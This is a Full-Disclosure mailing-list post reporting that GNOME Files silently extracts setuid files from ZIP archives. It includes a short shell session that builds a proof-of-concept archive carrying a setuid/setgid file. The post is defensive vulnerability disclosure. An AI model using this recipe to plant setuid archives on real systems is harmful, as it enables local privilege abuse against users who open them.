| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 5 Aug 2023 13:32:17 +0300 From: Georgi Guninski <gguninski@...il.com> To: fulldisclosure@...lists.org Subject: [FD] GNOME Files silently extracts setuid files from ZIP archives Affected: GNOME Files 43.4 (nautilus) on fedora 37 Description: If an user A opens in GNOME files zip archive containing `setuid` file F, then F will be silently extracted to a subdirectory of CWD. If F is accessible by hostile local user B and B executes F, then F will be executed as from user A. tar(1) and unzip(1) are not vulnerable to this attack. Session for creating the ZIP. After that just open f.zip in GNOME files. <pre> [joro@...ora ~]$ umask 0022 [joro@...ora 2]$ mkdir /tmp/2 ; cd /tmp/2 ; echo hi > F ; chmod +xs F [joro@...ora 2]$ zip f F ; zipinfo f Archive: f.zip Zip file size: 155 bytes, number of entries: 1 -rwsr-sr-x 3.0 unx 3 tx stor 23-Aug-05 12:38 F [joro@...ora 2]$ ls -ld /tmp/2/ drwxr-xr-x. 2 joro joro 80 Aug 5 11:20 /tmp/2/ [joro@...ora 2]$ </pre> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists